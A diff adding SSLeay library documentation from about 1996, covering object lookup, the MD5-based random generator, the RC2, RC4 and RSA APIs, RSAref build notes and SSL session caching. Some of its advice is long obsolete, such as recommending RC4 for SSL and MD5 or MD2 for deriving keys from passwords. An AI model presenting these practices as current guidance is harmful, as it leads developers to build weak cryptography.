+int OBJ_ln2nid(
+char *s);
+	Given the long/lower case name 's', return the NID of the object.
+	
+int OBJ_sn2nid(
+char *s);
+	Given the short name 's', return the NID of the object.
+	
+char *OBJ_bsearch(
+char *key,
+char *base,
+int num,
+int size,
+int (*cmp)());
+	Since I have come across a few platforms that do not have the
+	bsearch() function, OBJ_bsearch is my version of that function.
+	Feel free to use this function, but you may as well just use the
+	normal system bsearch(3) if it is present.  This version also
+	has tolerance of being passed NULL pointers.
+
+==== keys ===========================================================
+
+EVP_PKEY_DSA
+EVP_PKEY_DSA2
+EVP_PKEY_DSA3
+EVP_PKEY_DSA4
+
+EVP_PKEY_RSA
+EVP_PKEY_RSA2
+
+valid DSA pkey types
+	NID_dsa
+	NID_dsaWithSHA
+	NID_dsaWithSHA1
+	NID_dsaWithSHA1_2
+
+valid RSA pkey types
+	NID_rsaEncryption
+	NID_rsa
+
+NID_dsaWithSHA	NID_dsaWithSHA			DSA		SHA
+NID_dsa		NID_dsaWithSHA1			DSA		SHA1
+NID_md2		NID_md2WithRSAEncryption	RSA-pkcs1	MD2
+NID_md5		NID_md5WithRSAEncryption	RSA-pkcs1	MD5
+NID_mdc2	NID_mdc2WithRSA			RSA-none	MDC2
+NID_ripemd160	NID_ripemd160WithRSA		RSA-pkcs1	RIPEMD160
+NID_sha		NID_shaWithRSAEncryption	RSA-pkcs1	SHA
+NID_sha1	NID_sha1WithRSAEncryption	RSA-pkcs1	SHA1
+
+==== rand.doc ========================================================
+
+My Random number library.
+
+These routines can be used to generate pseudo random numbers and can be
+used to 'seed' the pseudo random number generator (RNG).  The RNG make no
+effort to reproduce the same random number stream with each execution.
+Various other routines in the SSLeay library 'seed' the RNG when suitable
+'random' input data is available.  Read the section at the end for details
+on the design of the RNG.
+
+void RAND_bytes(
+unsigned char *buf,
+int num);
+	This routine puts 'num' random bytes into 'buf'.  One should make
+	sure RAND_seed() has been called before using this routine.
+	
+void RAND_seed(
+unsigned char *buf,
+int num);
+	This routine adds more 'seed' data the RNG state.  'num' bytes
+	are added to the RNG state, they are taken from 'buf'.  This
+	routine can be called with sensitive data such as user entered
+	passwords.  This sensitive data is in no way recoverable from
+	the RAND library routines or state.  Try to pass as much data
+	from 'random' sources as possible into the RNG via this function.
+	Also strongly consider using the RAND_load_file() and
+	RAND_write_file() routines.
+
+void RAND_cleanup();
+	When a program has finished with the RAND library, if it so
+	desires, it can 'zero' all RNG state.
+	
+The following 3 routines are convenience routines that can be used to
+'save' and 'restore' data from/to the RNG and it's state.
+Since the more 'random' data that is feed as seed data the better, why not
+keep it around between executions of the program?  Of course the
+application should pass more 'random' data in via RAND_seed() and 
+make sure no-one can read the 'random' data file.
+	
+char *RAND_file_name(
+char *buf,
+int size);
+	This routine returns a 'default' name for the location of a 'rand'
+	file.  The 'rand' file should keep a sequence of random bytes used
+	to initialise the RNG.  The filename is put in 'buf'.  Buf is 'size'
+	bytes long.  Buf is returned if things go well, if they do not,
+	NULL is returned.  The 'rand' file name is generated in the
+	following way.  First, if there is a 'RANDFILE' environment
+	variable, it is returned.  Second, if there is a 'HOME' environment
+	variable, $HOME/.rand is returned.  Third, NULL is returned.  NULL
+	is also returned if a buf would overflow.
+
+int RAND_load_file(
+char *file,
+long number);
+	This function 'adds' the 'file' into the RNG state.  It does this by
+	doing a RAND_seed() on the value returned from a stat() system call
+	on the file and if 'number' is non-zero, upto 'number' bytes read
+	from the file.  The number of bytes passed to RAND_seed() is returned.
+
+int RAND_write_file(
+char *file),
+	RAND_write_file() writes N random bytes to the file 'file', where
+	N is the size of the internal RND state (currently 1k).
+	This is a suitable method of saving RNG state for reloading via
+	RAND_load_file().
+
+What follows is a description of this RNG and a description of the rational
+behind it's design.
+
+It should be noted that this RNG is intended to be used to generate
+'random' keys for various ciphers including generation of DH and RSA keys.  
+
+It should also be noted that I have just created a system that I am happy with.
+It may be overkill but that does not worry me.  I have not spent that much
+time on this algorithm so if there are glaring errors, please let me know.
+Speed has not been a consideration in the design of these routines.
+
+First up I will state the things I believe I need for a good RNG.
+1) A good hashing algorithm to mix things up and to convert the RNG 'state'
+   to random numbers.
+2) An initial source of random 'state'.
+3) The state should be very large.  If the RNG is being used to generate
+   4096 bit RSA keys, 2 2048 bit random strings are required (at a minimum).
+   If your RNG state only has 128 bits, you are obviously limiting the
+   search space to 128 bits, not 2048.  I'm probably getting a little
+   carried away on this last point but it does indicate that it may not be
+   a bad idea to keep quite a lot of RNG state.  It should be easier to
+   break a cipher than guess the RNG seed data.
+4) Any RNG seed data should influence all subsequent random numbers
+   generated.  This implies that any random seed data entered will have
+   an influence on all subsequent random numbers generated.
+5) When using data to seed the RNG state, the data used should not be
+   extractable from the RNG state.  I believe this should be a
+   requirement because one possible source of 'secret' semi random
+   data would be a private key or a password.  This data must
+   not be disclosed by either subsequent random numbers or a
+   'core' dump left by a program crash.
+6) Given the same initial 'state', 2 systems should deviate in their RNG state
+   (and hence the random numbers generated) over time if at all possible.
+7) Given the random number output stream, it should not be possible to determine
+   the RNG state or the next random number.
+
+
+The algorithm is as follows.
+
+There is global state made up of a 1023 byte buffer (the 'state'), a
+working message digest ('md') and a counter ('count').
+
+Whenever seed data is added, it is inserted into the 'state' as
+follows.
+	The input is chopped up into units of 16 bytes (or less for
+	the last block).  Each of these blocks is run through the MD5
+	message digest.  The data passed to the MD5 digest is the
+	current 'md', the same number of bytes from the 'state'
+	(the location determined by in incremented looping index) as
+	the current 'block' and the new key data 'block'.  The result
+	of this is kept in 'md' and also xored into the 'state' at the
+	same locations that were used as input into the MD5.
+	I believe this system addresses points 1 (MD5), 3 (the 'state'),
+	4 (via the 'md'), 5 (by the use of MD5 and xor).
+
+When bytes are extracted from the RNG, the following process is used.
+For each group of 8 bytes (or less), we do the following,
+	Input into MD5, the top 8 bytes from 'md', the byte that are
+	to be overwritten by the random bytes and bytes from the
+	'state' (incrementing looping index).  From this digest output
+	(which is kept in 'md'), the top (upto) 8 bytes are
+	returned to the caller and the bottom (upto) 8 bytes are xored
+	into the 'state'.
+	Finally, after we have finished 'generation' random bytes for the
+	called, 'count' (which is incremented) and 'md' are fed into MD5 and
+	the results are kept in 'md'.
+	I believe the above addressed points 1 (use of MD5), 6 (by
+	hashing into the 'state' the 'old' data from the caller that
+	is about to be overwritten) and 7 (by not using the 8 bytes
+	given to the caller to update the 'state', but they are used
+	to update 'md').
+
+So of the points raised, only 2 is not addressed, but sources of
+random data will always be a problem.
+	
+
+==== rc2.doc ========================================================
+
+The RC2 library.
+
+RC2 is a block cipher that operates on 64bit (8 byte) quantities.  It
+uses variable size key, but 128bit (16 byte) key would normally be considered
+good.  It can be used in all the modes that DES can be used.  This
+library implements the ecb, cbc, cfb64, ofb64 modes.
+
+I have implemented this library from an article posted to sci.crypt on
+11-Feb-1996.  I personally don't know how far to trust the RC2 cipher.
+While it is capable of having a key of any size, not much reseach has
+publically been done on it at this point in time (Apr-1996)
+since the cipher has only been public for a few months :-)
+It is of a similar speed to DES and IDEA, so unless it is required for
+meeting some standard (SSLv2, perhaps S/MIME), it would probably be advisable
+to stick to IDEA, or for the paranoid, Tripple DES.
+
+Mind you, having said all that, I should mention that I just read alot and
+implement ciphers, I'm a 'babe in the woods' when it comes to evaluating
+ciphers :-).
+
+For all calls that have an 'input' and 'output' variables, they can be the
+same.
+
+This library requires the inclusion of 'rc2.h'.
+
+All of the encryption functions take what is called an RC2_KEY as an 
+argument.  An RC2_KEY is an expanded form of the RC2 key.
+For all modes of the RC2 algorithm, the RC2_KEY used for
+decryption is the same one that was used for encryption.
+
+The define RC2_ENCRYPT is passed to specify encryption for the functions
+that require an encryption/decryption flag. RC2_DECRYPT is passed to
+specify decryption.
+
+Please note that any of the encryption modes specified in my DES library
+could be used with RC2.  I have only implemented ecb, cbc, cfb64 and
+ofb64 for the following reasons.
+- ecb is the basic RC2 encryption.
+- cbc is the normal 'chaining' form for block ciphers.
+- cfb64 can be used to encrypt single characters, therefore input and output
+  do not need to be a multiple of 8.
+- ofb64 is similar to cfb64 but is more like a stream cipher, not as
+  secure (not cipher feedback) but it does not have an encrypt/decrypt mode.
+- If you want triple RC2, thats 384 bits of key and you must be totally
+  obsessed with security.  Still, if you want it, it is simple enough to
+  copy the function from the DES library and change the des_encrypt to
+  RC2_encrypt; an exercise left for the paranoid reader :-).
+
+The functions are as follows:
+
+void RC2_set_key(
+RC2_KEY *ks;
+int len;
+unsigned char *key;
+int bits;
+        RC2_set_key converts an 'len' byte key into a RC2_KEY.
+        A 'ks' is an expanded form of the 'key' which is used to
+        perform actual encryption.  It can be regenerated from the RC2 key
+        so it only needs to be kept when encryption or decryption is about
+        to occur.  Don't save or pass around RC2_KEY's since they
+        are CPU architecture dependent, 'key's are not.  RC2 is an
+	interesting cipher in that it can be used with a variable length
+	key.  'len' is the length of 'key' to be used as the key.
+	A 'len' of 16 is recomended.  The 'bits' argument is an
+	interesting addition which I only found out about in Aug 96.
+	BSAFE uses this parameter to 'limit' the number of bits used
+	for the key.  To use the 'key' unmodified, set bits to 1024.
+	This is what old versions of my RC2 library did (SSLeay 0.6.3).
+	RSAs BSAFE library sets this parameter to be 128 if 128 bit
+	keys are being used.  So to be compatable with BSAFE, set it
+	to 128, if you don't want to reduce RC2's key length, leave it
+	at 1024.
+	
+void RC2_encrypt(
+unsigned long *data,
+RC2_KEY *key,
+int encrypt);
+	This is the RC2 encryption function that gets called by just about
+	every other RC2 routine in the library.  You should not use this
+	function except to implement 'modes' of RC2.  I say this because the
+	functions that call this routine do the conversion from 'char *' to
+	long, and this needs to be done to make sure 'non-aligned' memory
+	access do not occur.
+	Data is a pointer to 2 unsigned long's and key is the
+	RC2_KEY to use.  Encryption or decryption is indicated by 'encrypt'.
+	which can have the values RC2_ENCRYPT or RC2_DECRYPT.
+
+void RC2_ecb_encrypt(
+unsigned char *in,
+unsigned char *out,
+RC2_KEY *key,
+int encrypt);
+	This is the basic Electronic Code Book form of RC2 (in DES this
+	mode is called Electronic Code Book so I'm going to use the term
+	for rc2 as well.
+	Input is encrypted into output using the key represented by
+	key.  Depending on the encrypt, encryption or
+	decryption occurs.  Input is 8 bytes long and output is 8 bytes.
+	
+void RC2_cbc_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+RC2_KEY *ks,
+unsigned char *ivec,
+int encrypt);
+	This routine implements RC2 in Cipher Block Chaining mode.
+	Input, which should be a multiple of 8 bytes is encrypted
+	(or decrypted) to output which will also be a multiple of 8 bytes.
+	The number of bytes is in length (and from what I've said above,
+	should be a multiple of 8).  If length is not a multiple of 8, bad 
+	things will probably happen.  ivec is the initialisation vector.
+	This function updates iv after each call so that it can be passed to
+	the next call to RC2_cbc_encrypt().
+	
+void RC2_cfb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+RC2_KEY *schedule,
+unsigned char *ivec,
+int *num,
+int encrypt);
+	This is one of the more useful functions in this RC2 library, it
+	implements CFB mode of RC2 with 64bit feedback.
+	This allows you to encrypt an arbitrary number of bytes,
+	you do not require 8 byte padding.  Each call to this
+	routine will encrypt the input bytes to output and then update ivec
+	and num.  Num contains 'how far' we are though ivec.
+	'Encrypt' is used to indicate encryption or decryption.
+	CFB64 mode operates by using the cipher to generate a stream
+	of bytes which is used to encrypt the plain text.
+	The cipher text is then encrypted to generate the next 64 bits to
+	be xored (incrementally) with the next 64 bits of plain
+	text.  As can be seen from this, to encrypt or decrypt,
+	the same 'cipher stream' needs to be generated but the way the next
+	block of data is gathered for encryption is different for
+	encryption and decryption.
+	
+void RC2_ofb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+RC2_KEY *schedule,
+unsigned char *ivec,
+int *num);
+	This functions implements OFB mode of RC2 with 64bit feedback.
+	This allows you to encrypt an arbitrary number of bytes,
+	you do not require 8 byte padding.  Each call to this
+	routine will encrypt the input bytes to output and then update ivec
+	and num.  Num contains 'how far' we are though ivec.
+	This is in effect a stream cipher, there is no encryption or
+	decryption mode.
+	
+For reading passwords, I suggest using des_read_pw_string() from my DES library.
+To generate a password from a text string, I suggest using MD5 (or MD2) to
+produce a 16 byte message digest that can then be passed directly to
+RC2_set_key().
+
+=====
+For more information about the specific RC2 modes in this library
+(ecb, cbc, cfb and ofb), read the section entitled 'Modes of DES' from the
+documentation on my DES library.  What is said about DES is directly
+applicable for RC2.
+
+
+==== rc4.doc ========================================================
+
+The RC4 library.
+RC4 is a stream cipher that operates on a byte stream.  It can be used with
+any length key but I would recommend normally using 16 bytes.
+
+This library requires the inclusion of 'rc4.h'.
+
+The RC4 encryption function takes what is called an RC4_KEY as an argument.
+The RC4_KEY is generated by the RC4_set_key function from the key bytes.
+
+RC4, being a stream cipher, does not have an encryption or decryption mode.
+It produces a stream of bytes that the input stream is xor'ed against and
+so decryption is just a case of 'encrypting' again with the same key.
+
+I have only put in one 'mode' for RC4 which is the normal one.  This means
+there is no initialisation vector and there is no feedback of the cipher
+text into the cipher.  This implies that you should not ever use the
+same key twice if you can help it.  If you do, you leave yourself open to
+known plain text attacks; if you know the plain text and
+corresponding cipher text in one message, all messages that used the same
+key can have the cipher text decoded for the corresponding positions in the
+cipher stream.
+
+The main positive feature of RC4 is that it is a very fast cipher; about 4
+times faster that DES.  This makes it ideally suited to protocols where the
+key is randomly chosen, like SSL.
+
+The functions are as follows:
+
+void RC4_set_key(
+RC4_KEY *key;
+int len;
+unsigned char *data);
+	This function initialises the RC4_KEY structure with the key passed
+	in 'data', which is 'len' bytes long.  The key data can be any
+	length but 16 bytes seems to be a good number.
+
+void RC4(
+RC4_KEY *key;
+unsigned long len;
+unsigned char *in;
+unsigned char *out);
+	Do the actual RC4 encryption/decryption.  Using the 'key', 'len'
+	bytes are transformed from 'in' to 'out'.  As mentioned above,
+	decryption is the operation as encryption.
+
+==== ref.doc ========================================================
+
+I have lots more references etc, and will update this list in the future,
+30 Aug 1996 - eay
+
+
+SSL	The SSL Protocol - from Netscapes.
+
+RC4	Newsgroups: sci.crypt
+	From: sterndark@netcom.com (David Sterndark)
+	Subject: RC4 Algorithm revealed.
+	Message-ID: <sternCvKL4B.Hyy@netcom.com>
+
+RC2	Newsgroups: sci.crypt
+	From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
+	Subject: Specification for Ron Rivests Cipher No.2
+	Message-ID: <4fk39f$f70@net.auckland.ac.nz>
+
+MD2	RFC1319 The MD2 Message-Digest Algorithm
+MD5	RFC1321 The MD5 Message-Digest Algorithm
+
+X509 Certificates
+	RFC1421 Privacy Enhancement for Internet Electronic Mail: Part I
+	RFC1422 Privacy Enhancement for Internet Electronic Mail: Part II
+	RFC1423 Privacy Enhancement for Internet Electronic Mail: Part III
+	RFC1424 Privacy Enhancement for Internet Electronic Mail: Part IV
+
+RSA and various standard encoding
+	PKCS#1 RSA Encryption Standard
+	PKCS#5 Password-Based Encryption Standard
+	PKCS#7 Cryptographic Message Syntax Standard
+	A Layman's Guide to a Subset of ASN.1, BER, and DER
+	An Overview of the PKCS Standards
+	Some Examples of the PKCS Standards
+
+IDEA	Chapter 3 The Block Cipher IDEA
+
+RSA, prime number generation and bignum algorithms
+	Introduction To Algorithms,
+	Thomas Cormen, Charles Leiserson, Ronald Rivest,
+	Section 29 Arithmetic Circuits
+	Section 33 Number-Theoretic Algorithms
+
+Fast Private Key algorithm
+	Fast Decipherment Algorithm for RSA Public-Key Cryptosystem
+	J.-J. Quisquater and C. Couvreur, Electronics Letters,
+	14th October 1982, Vol. 18 No. 21
+
+Prime number generation and bignum algorithms.
+	PGP-2.3a
+
+==== rsa.doc ========================================================
+
+The RSA encryption and utility routines.
+
+The RSA routines are built on top of a big number library (the BN library).
+There are support routines in the X509 library for loading and manipulating
+the various objects in the RSA library.  When errors are returned, read
+about the ERR library for how to access the error codes.
+
+All RSA encryption is done according to the PKCS-1 standard which is
+compatible with PEM and RSAref.  This means that any values being encrypted
+must be less than the size of the modulus in bytes, minus 10, bytes long.
+
+This library uses RAND_bytes()() for it's random data, make sure to feed
+RAND_seed() with lots of interesting and varied data before using these
+routines.
+
+The RSA library has one specific data type, the RSA structure.
+It is composed of 8 BIGNUM variables (see the BN library for details) and
+can hold either a private RSA key or a public RSA key.
+Some RSA libraries have different structures for public and private keys, I
+don't.  For my libraries, a public key is determined by the fact that the
+RSA->d value is NULL.  These routines will operate on any size RSA keys.
+While I'm sure 4096 bit keys are very very secure, they take a lot longer
+to process that 1024 bit keys :-).
+
+The function in the RSA library are as follows.
+
+RSA *RSA_new();
+	This function creates a new RSA object.  The sub-fields of the RSA
+	type are also malloced so you should always use this routine to
+	create RSA variables.
+	
+void RSA_free(
+RSA *rsa);
+	This function 'frees' an RSA structure.  This routine should always
+	be used to free the RSA structure since it will also 'free' any
+	sub-fields of the RSA type that need freeing.
+	
+int RSA_size(
+RSA *rsa);	
+	This function returns the size of the RSA modulus in bytes.  Why do
+	I need this you may ask, well the reason is that when you encrypt
+	with RSA, the output string will be the size of the RSA modulus.
+	So the output for the RSA_encrypt and the input for the RSA_decrypt
+	routines need to be RSA_size() bytes long, because this is how many
+	bytes are expected.
+	
+For the following 4 RSA encryption routines, it should be noted that
+RSA_private_decrypt() should be used on the output from 
+RSA_public_encrypt() and RSA_public_decrypt() should be used on
+the output from RSA_private_encrypt().
+	
+int RSA_public_encrypt(
+int from_len;
+unsigned char *from	
+unsigned char *to	
+RSA *rsa);
+	This function implements RSA public encryption, the rsa variable
+	should be a public key (but can be a private key).  'from_len'
+	bytes taken from 'from' and encrypted and put into 'to'.  'to' needs
+	to be at least RSA_size(rsa) bytes long.  The number of bytes
+	written into 'to' is returned.  -1 is returned on an error.  The
+	operation performed is
+	to = from^rsa->e mod rsa->n.
+	
+int RSA_private_encrypt(
+int from_len;
+unsigned char *from	
+unsigned char *to	
+RSA *rsa);
+	This function implements RSA private encryption, the rsa variable
+	should be a private key.  'from_len' bytes taken from
+	'from' and encrypted and put into 'to'.  'to' needs
+	to be at least RSA_size(rsa) bytes long.  The number of bytes
+	written into 'to' is returned.  -1 is returned on an error.  The
+	operation performed is
+	to = from^rsa->d mod rsa->n.
+
+int RSA_public_decrypt(
+int from_len;
+unsigned char *from	
+unsigned char *to	
+RSA *rsa);
+	This function implements RSA public decryption, the rsa variable
+	should be a public key (but can be a private key).  'from_len'
+	bytes are taken from 'from' and decrypted.  The decrypted data is
+	put into 'to'.  The number of bytes encrypted is returned.  -1 is
+	returned to indicate an error. The operation performed is
+	to = from^rsa->e mod rsa->n.
+
+int RSA_private_decrypt(
+int from_len;
+unsigned char *from	
+unsigned char *to	
+RSA *rsa);
+	This function implements RSA private decryption, the rsa variable
+	should be a private key.  'from_len' bytes are taken
+	from 'from' and decrypted.  The decrypted data is
+	put into 'to'.  The number of bytes encrypted is returned.  -1 is
+	returned to indicate an error. The operation performed is
+	to = from^rsa->d mod rsa->n.
+
+int RSA_mod_exp(
+BIGNUM *n;
+BIGNUM *p;
+RSA *rsa);
+	Normally you will never use this routine.
+	This is really an internal function which is called by
+	RSA_private_encrypt() and RSA_private_decrypt().  It performs
+	n=n^p mod rsa->n except that it uses the 5 extra variables in the
+	RSA structure to make this more efficient.
+	
+RSA *RSA_generate_key(
+int bits;
+unsigned long e;
+void (*callback)();
+char *cb_arg;
+	This routine is used to generate RSA private keys.  It takes
+	quite a period of time to run and should only be used to
+	generate initial private keys that should then be stored
+	for later use.  The passed callback function 
+	will be called periodically so that feedback can be given
+	as to how this function is progressing.
+	'bits' is the length desired for the modulus, so it would be 1024
+	to generate a 1024 bit private key.
+	'e' is the value to use for the public exponent 'e'.  Traditionally
+	it is set to either 3 or 0x10001.
+	The callback function (if not NULL) is called in the following
+	situations.
+	when we have generated a suspected prime number to test,
+	callback(0,num1++,cb_arg).  When it passes a prime number test,
+	callback(1,num2++,cb_arg).  When it is rejected as one of
+	the 2 primes required due to gcd(prime,e value) != 0,
+	callback(2,num3++,cb_arg).  When finally accepted as one
+	of the 2 primes, callback(3,num4++,cb_arg).
+
+
+==== rsaref.doc ========================================================
+
+This package can be compiled to use the RSAref library.
+This library is not allowed outside of the USA but inside the USA it is
+claimed by RSA to be the only RSA public key library that can be used
+besides BSAFE..
+
+There are 2 files, rsaref/rsaref.c and rsaref/rsaref.h that contain the glue
+code to use RSAref.  These files were written by looking at the PGP
+source code and seeing which routines it used to access RSAref.
+I have also been sent by some-one a copy of the RSAref header file that
+contains the library error codes.
+
+[ Jun 1996 update - I have recently gotten hold of RSAref 2.0 from
+  South Africa and have been doing some performace tests. ]
+	
+They have now been tested against the recently announced RSAEURO
+library.
+
+There are 2 ways to use SSLeay and RSAref.  First, to build so that
+the programs must be linked with RSAref, add '-DRSAref' to CFLAG in the top
+level makefile and -lrsaref (or where ever you are keeping RSAref) to
+EX_LIBS.
+
+To build a makefile via util/mk1mf.pl to do this, use the 'rsaref' option.
+
+The second method is to build as per normal and link applications with
+the RSAglue library.  The correct library order would be
+cc -o cmd cmd.o -lssl -lRSAglue -lcrypto -lrsaref -ldes
+The RSAglue library is built in the rsa directory and is NOT
+automatically installed.
+
+Be warned that the RSAEURO library, that is claimed to be compatible
+with RSAref contains a different value for the maximum number of bits
+supported.  This changes structure sizes and so if you are using
+RSAEURO, change the value of RSAref_MAX_BITS in rsa/rsaref.h
+
+
+==== s_mult.doc ========================================================
+
+s_mult is a test program I hacked up on a Sunday for testing non-blocking
+IO.  It has a select loop at it's centre that handles multiple readers
+and writers.
+
+Try the following command
+ssleay s_mult -echo -nbio -ssl -v
+echo - sends any sent text back to the sender
+nbio - turns on non-blocking IO
+ssl  - accept SSL connections, default is normal text
+v    - print lots
+	type Q<cr> to quit
+
+In another window, run the following
+ssleay s_client -pause </etc/termcap
+
+The pause option puts in a 1 second pause in each read(2)/write(2) call
+so the other end will have read()s fail.
+
+==== session.doc ========================================================
+
+I have just checked over and re-worked the session stuff.
+The following brief example will ignore all setup information to do with
+authentication.
+
+Things operate as follows.
+
+The SSL environment has a 'context', a SSL_CTX structure.  This holds the
+cached SSL_SESSIONS (which can be reused) and the certificate lookup
+information.  Each SSL structure needs to be associated with a SSL_CTX.
+Normally only one SSL_CTX structure is needed per program.
+
+SSL_CTX *SSL_CTX_new(void ); 
+void    SSL_CTX_free(SSL_CTX *);
+These 2 functions create and destroy SSL_CTX structures
+
+The SSL_CTX has a session_cache_mode which is by default,
+in SSL_SESS_CACHE_SERVER mode.  What this means is that the library
+will automatically add new session-id's to the cache upon successful
+SSL_accept() calls.
+If SSL_SESS_CACHE_CLIENT is set, then client certificates are also added
+to the cache.
+SSL_set_session_cache_mode(ctx,mode)  will set the 'mode' and
+SSL_get_session_cache_mode(ctx) will get the cache 'mode'.
+The modes can be
+SSL_SESS_CACHE_OFF	- no caching
+SSL_SESS_CACHE_CLIENT	- only SSL_connect()
+SSL_SESS_CACHE_SERVER	- only SSL_accept()
+SSL_SESS_NO_CACHE_BOTH	- Either SSL_accept() or SSL_connect().
+If SSL_SESS_CACHE_NO_AUTO_CLEAR is set, old timed out sessions are
+not automatically removed each 255, SSL_connect()s or SSL_accept()s.
+
+By default, upon every 255 successful SSL_connect() or SSL_accept()s,
+the cache is flush.  Please note that this could be expensive on
+a heavily loaded SSL server, in which case, turn this off and
+clear the cache of old entries 'manually' (with one of the functions
+listed below) every few hours.  Perhaps I should up this number, it is hard
+to say.  Remember, the '255' new calls is just a mechanism to get called
+every now and then, in theory at most 255 new session-id's will have been
+added but if 100 are added every minute, you would still have
+500 in the cache before any would start being flushed (assuming a 3 minute
+timeout)..
+
+int SSL_CTX_sess_hits(SSL_CTX *ctx);
+int SSL_CTX_sess_misses(SSL_CTX *ctx);
+int SSL_CTX_sess_timeouts(SSL_CTX *ctx);
+These 3 functions return statistics about the SSL_CTX.  These 3 are the
+number of session id reuses.  hits is the number of reuses, misses are the
+number of lookups that failed, and timeouts is the number of cached
+entries ignored because they had timeouted.
+
+ctx->new_session_cb is a function pointer to a function of type
+int new_session_callback(SSL *ssl,SSL_SESSION *new);
+This function, if set in the SSL_CTX structure is called whenever a new
+SSL_SESSION is added to the cache.  If the callback returns non-zero, it
+means that the application will have to do a SSL_SESSION_free()
+on the structure (this is
+to do with the cache keeping the reference counts correct, without the
+application needing to know about it.
+The 'active' parameter is the current SSL session for which this connection
+was created.
+
+void SSL_CTX_sess_set_new_cb(SSL_CTX *ctx,int (*cb)());
+to set the callback,
+int (*cb)() SSL_CTX_sess_get_new_cb(SSL_CTX *ctx)
+to get the callback.
+
+If the 'get session' callback is set, when a session id is looked up and
+it is not in the session-id cache, this callback is called.  The callback is
+of the form
+SSL_SESSION *get_session_callback(unsigned char *sess_id,int sess_id_len,
+	int *copy);
+
+The get_session_callback is intended to return null if no session id is found.
+The reference count on the SSL_SESSION in incremented by the SSL library,
+if copy is 1.  Otherwise, the reference count is not modified.
+
+void SSL_CTX_sess_set_get_cb(ctx,cb) sets the callback and
+int (*cb)()SSL_CTX_sess_get_get_cb(ctx) returns the callback.
+
+These callbacks are basically intended to be used by processes to
+send their session-id's to other processes.  I currently have not implemented
+non-blocking semantics for these callbacks, it is upto the application
+to make the callbacks efficient if they require blocking (perhaps
+by 'saving' them and then 'posting them' when control returns from
+the SSL_accept().
+
+LHASH *SSL_CTX_sessions(SSL_CTX *ctx)
+This returns the session cache.  The lhash strucutre can be accessed for
+statistics about the cache.
+
+void lh_stats(LHASH *lh, FILE *out);
+void lh_node_stats(LHASH *lh, FILE *out);
+void lh_node_usage_stats(LHASH *lh, FILE *out);
+
+can be used to print details about it's activity and current state.
+You can also delve directly into the lhash structure for 14 different
+counters that are kept against the structure.  When I wrote the lhash library,
+I was interested in gathering statistics :-).
+Have a read of doc/lhash.doc in the SSLeay distribution area for more details
+on the lhash library.
+
+Now as mentioned ealier, when a SSL is created, it needs a SSL_CTX.
+SSL *   SSL_new(SSL_CTX *);
+
+This stores a session.  A session is secret information shared between 2
+SSL contexts.  It will only be created if both ends of the connection have
+authenticated their peer to their satisfaction.  It basically contains
+the information required to use a particular secret key cipher.
+
+To retrieve the SSL_CTX being used by a SSL,
+SSL_CTX *SSL_get_SSL_CTX(SSL *s);
+
+Now when a SSL session is established between to programs, the 'session'
+information that is cached in the SSL_CTX can me manipulated by the
+following functions.
+int SSL_set_session(SSL *s, SSL_SESSION *session);
+This will set the SSL_SESSION to use for the next SSL_connect().  If you use
+this function on an already 'open' established SSL connection, 'bad things
+will happen'.  This function is meaning-less when used on a ssl strucutre
+that is just about to be used in a SSL_accept() call since the
+SSL_accept() will either create a new session or retrieve one from the
+cache.
+
+SSL_SESSION *SSL_get_session(SSL *s);
+This will return the SSL_SESSION for the current SSL, NULL if there is
+no session associated with the SSL structure.
+
+The SSL sessions are kept in the SSL_CTX in a hash table, to remove a
+session
+void    SSL_CTX_remove_session(SSL_CTX *,SSL_SESSION *c);
+and to add one
+int    SSL_CTX_add_session(SSL_CTX *s, SSL_SESSION *c);
+SSL_CTX_add_session() returns 1 if the session was already in the cache (so it
+was not added).
+Whenever a new session is created via SSL_connect()/SSL_accept(),
+they are automatically added to the cache, depending on the session_cache_mode
+settings.  SSL_set_session()
+does not add it to the cache.  Just call SSL_CTX_add_session() if you do want the
+session added.  For a 'client' this would not normally be the case.
+SSL_CTX_add_session() is not normally ever used, except for doing 'evil' things
+which the next 2 funtions help you do.
+
+int     i2d_SSL_SESSION(SSL_SESSION *in,unsigned char **pp);
+SSL_SESSION *d2i_SSL_SESSION(SSL_SESSION **a,unsigned char **pp,long length);
+These 2 functions are in the standard ASN1 library form and can be used to
+load and save to a byte format, the SSL_SESSION structure.
+With these functions, you can save and read these structures to a files or
+arbitary byte string.
+The PEM_write_SSL_SESSION(fp,x) and PEM_read_SSL_SESSION(fp,x,cb) will
+write to a file pointer in base64 encoding.
+
+What you can do with this, is pass session information between separate
+processes.  Please note, that you will probably also need to modify the
+timeout information on the SSL_SESSIONs.
+
+long SSL_get_time(SSL_SESSION *s)
+will return the 'time' that the session
+was loaded.  The timeout is relative to this time.  This information is
+saved when the SSL_SESSION is converted to binarary but it is stored
+in as a unix long, which is rather OS dependant, but easy to convert back.
+
+long SSL_set_time(SSL_SESSION *s,long t) will set the above mentioned time.
+The time value is just the value returned from time(3), and should really
+be defined by be to be time_t.
+
+long SSL_get_timeout(SSL_SESSION *s);
+long SSL_set_timeout(SSL_SESSION *s,long t);
+These 2 retrieve and set the timeout which is just a number of secconds
+from the 'SSL_get_time()' value.  When this time period has elapesed,
+the session will no longer be in the cache (well it will actually be removed
+the next time it is attempted to be retrieved, so you could 'bump'
+the timeout so it remains valid).
+The 'time' and 'timeout' are set on a session when it is created, not reset
+each time it is reused.  If you did wish to 'bump it', just after establishing
+a connection, do a
+SSL_set_time(ssl,time(NULL));
+
+You can also use
+SSL_CTX_set_timeout(SSL_CTX *ctx,unsigned long t) and
+SSL_CTX_get_timeout(SSL_CTX *ctx) to manipulate the default timeouts for
+all SSL connections created against a SSL_CTX.  If you set a timeout in
+an SSL_CTX, all new SSL's created will inherit the timeout.  It can be over
+written by the SSL_set_timeout(SSL *s,unsigned long t) function call.
+If you 'set' the timeout back to 0, the system default will be used.
+
+SSL_SESSION *SSL_SESSION_new();
+void SSL_SESSION_free(SSL_SESSION *ses);
+These 2 functions are used to create and dispose of SSL_SESSION functions.
+You should not ever normally need to use them unless you are using 
+i2d_SSL_SESSION() and/or d2i_SSL_SESSION().  If you 'load' a SSL_SESSION
+via d2i_SSL_SESSION(), you will need to SSL_SESSION_free() it.
+Both SSL_set_session() and SSL_CTX_add_session() will 'take copies' of the
+structure (via reference counts) when it is passed to them.
+
+SSL_CTX_flush_sessions(ctx,time);
+The first function will clear all sessions from the cache, which have expired
+relative to 'time' (which could just be time(NULL)).
+
+SSL_CTX_flush_sessions(ctx,0);
